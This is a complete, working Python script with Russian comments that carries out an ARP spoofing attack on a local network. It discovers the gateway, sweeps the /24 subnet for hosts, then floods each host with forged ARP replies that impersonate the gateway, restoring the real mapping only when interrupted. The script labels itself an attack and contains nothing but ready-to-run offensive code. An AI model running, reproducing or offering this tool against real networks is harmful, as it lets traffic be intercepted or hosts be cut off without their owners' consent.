# pip install --pre scapy[basic]

import sys
from platform import system
from socket import socket, AF_INET, SOCK_DGRAM, gethostbyname
from subprocess import check_output
import os

import scapy.all as sc


def local_ipv4():
    """
    Получаем локальный ip-адрес.
    :return: Локальный ip-адрес. В случае неудачи - адрес локальной петли.
    """
    st = socket(AF_INET, SOCK_DGRAM)
    try:
        st.connect(('10.255.255.255', 1))
        ip = st.getsockname()[0]
    except Exception:
        ip = '127.0.0.1'
    finally:
        st.close()
    return ip


def router():
    """
    Получаем ip-адрес шлюза по умолчанию.
    :return: Возвращаем ip-адрес.
    """
    ip_route = None
    if system() == "Linux":
        ip_route = str(check_output('route -n | grep UG', shell=True).decode()).split()[1]
    elif system() == "Windows":
        com = 'route PRINT 0* -4 | findstr 0.0.0.0'.split()
        interface_temp = check_output(com, shell=True).decode('cp866')
        ip_route = interface_temp.split()[-3]

    if ip_route.isdigit():
        return ip_route
    else:
        sock = gethostbyname(ip_route)
        return sock


def get_ip_mac_nework(ip, gateway):
    """
    Сканируем сеть. Получаем ip и mac-адреса машин в сети.
    :param ip: CIDR, ip-адрес с подсетью.
    :param gateway: IP-адрес шлюза.
    :return: Список с ip-адресами, кроме ip-адреса шлюза; mac-адрес шлюза.
    """
    answered_list = sc.srp(sc.Ether(dst='ff:ff:ff:ff:ff:ff') / sc.ARP(pdst=ip), timeout=1, verbose=False)[0]
    clients_list = []
    gateway_mac = "127.0.0.1"
    for element in answered_list:
        if element[1].psrc == gateway:
            gateway_mac = element[1].hwsrc
            continue
        clients_list.append(element[1].psrc)
    return clients_list, gateway_mac


def arp_spoof(packets, packet_true):
    """
    Выполнение подмены mac-адреса шлюза по умолчанию.
    :param packets: Список с пакетами для подмены.
    :param packet_true: Список с пакетами для восстановления.
    """
    print("\n[~] Beginning of attack...")
    try:
        while True:
            for packet in packets:
                sc.send(packet, verbose=False)
    except KeyboardInterrupt:
        for packet in packet_true:
            sc.send(packet, verbose=False)
        print("\r[-] Attack complete. Good by!")


def main():
    if system() == 'Linux':
        if not os.getuid() == 0:
            print('\n[+] Запустите скрипт с правами суперпользователя!\n')
            sys.exit(0)
    local_ip = local_ipv4()
    gateway = router()
    ip_mac_network, gateway_mac = get_ip_mac_nework(f'{".".join(local_ip.split(".")[:-1])}.1/24', gateway)
    if ip_mac_network:
        print(f'\n[+] Local IP: {local_ip}\n[+] Local Gateway: {gateway}\n[+] Local Gateway Mac: {gateway_mac}')
        packets = []
        packet_true = []
        for ip in ip_mac_network:
            packets.append(sc.ARP(op=2, pdst=ip, hwdst="ff:ff:ff:ff:ff:ff", psrc=gateway))
            packet_true.append(sc.ARP(op=2, pdst=ip, hwdst=gateway_mac, psrc=gateway))
        arp_spoof(packets, packet_true)
    else:
        print("Машин в сети не обнаружено")


if __name__ == "__main__":
    main()
